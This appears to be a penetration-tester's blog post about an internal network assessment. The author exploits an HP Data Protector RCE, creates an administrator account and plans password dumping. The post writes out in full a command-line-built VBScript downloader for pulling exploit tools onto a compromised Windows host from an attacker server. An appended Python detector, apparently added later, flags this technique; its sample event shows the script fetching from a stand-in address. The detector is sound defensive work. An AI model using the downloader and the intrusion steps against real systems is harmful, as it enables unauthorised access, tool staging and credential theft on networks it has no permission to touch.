Wget For Windows
Pentesting in different environments brings various challenges. I would like to share my experience with a recent internal network assessment, the challenges I faced and how I was able to get over them.
So as usual the pentest started with scanning the various networks. Apart from a few Cisco default credentials, there was nothing more in the environment that could give me something juicy. Finally one of my scans revealed that a few of the systems were vulnerable to the HP Data Protector Remote Code Execution. Thank you Lord!!!

I quickly fired up Metasploit and used a meterpreter payload and NOTHING!!.. Not to worry.

"If you don’t have it create it"
I downloaded the python exploit from exploit-db and boom RCE.
Next I checked the privileges this service was running with. Administrator ☺
Made a user on the system and added the user to the administrators group and the Remote Desktop Users group.
Now that I was in the box I wanted to dump the passwords using pwdump.exe, but for some reason copy and paste wasn’t working. Now there are two ways to go about this problem and both involve using our attacking machine as a server.
I always use “python -m SimpleHTTPServer 80” to serve my exploits. So I opened the browser to connect to my attacking machine. The browser wouldn’t connect to my machine.
Now a Linux box comes with various command line browsers/tools like curl, wget, fetch, scp. Someone famous once said “If you don’t have it create it”. Create our own wget on Windows.

 

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

 

Now that you have your own wget you can get over the restrictions put on the browser to download all the exploits you want. ☺

Happy Hacking ☺
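
From the defender's side, the technique above leaves two correlatable traces: a script file created by a command shell, and a Windows script host run with a URL on its command line. The following is an added example, not part of the original post, that applies that correlation to constructed events loosely modelled on Sysmon FileCreate (ID 11) and ProcessCreate (ID 1); the field names, hosts, paths and the 192.0.2.10 address are assumptions.

```python
import re
from pathlib import PureWindowsPath

SCRIPT_EXT = {".vbs", ".vbe", ".js", ".jse", ".wsf"}
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)

# Constructed sample events (assumed, simplified field names):
# id 11 = file created by a process, id 1 = process created.
SAMPLE_EVENTS = [
    {"id": 11, "host": "WS01", "image": r"C:\Windows\System32\cmd.exe",
     "target": r"C:\Users\tmpadmin\wget.vbs"},
    {"id": 1, "host": "WS01", "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript wget.vbs http://192.0.2.10/tool.exe tool.exe"},
    {"id": 1, "host": "WS02", "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript //nologo C:\Windows\System32\slmgr.vbs /dli"},
    {"id": 11, "host": "WS03", "image": r"C:\Program Files\Editor\edit.exe",
     "target": r"C:\Dev\build.vbs"},
]

def basename(path):
    return PureWindowsPath(path).name.lower()

def detect(events):
    """Alert on script-host runs that take a URL argument; severity is 'high'
    when a command shell wrote that script on the same host earlier."""
    shell_written = set()   # (host, script file name) created by a shell
    alerts = []
    for ev in events:
        if ev["id"] == 11:
            name = basename(ev["target"])
            if basename(ev["image"]) in SHELLS and PureWindowsPath(name).suffix in SCRIPT_EXT:
                shell_written.add((ev["host"], name))
        elif ev["id"] == 1 and basename(ev["image"]) in SCRIPT_HOSTS:
            urls = URL_RE.findall(ev["cmdline"])
            if not urls:
                continue   # ordinary admin script use, no remote fetch argument
            scripts = [basename(tok.strip('"')) for tok in ev["cmdline"].split()
                       if PureWindowsPath(tok.strip('"')).suffix.lower() in SCRIPT_EXT]
            dropped = any((ev["host"], s) in shell_written for s in scripts)
            alerts.append({"host": ev["host"], "url": urls[0],
                           "severity": "high" if dropped else "medium"})
    return alerts

if __name__ == "__main__":
    print(detect(SAMPLE_EVENTS))
```

Only the first `>` redirection creates the file, so a single file-creation event is expected per dropped script; the later `>>` appends do not produce one.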
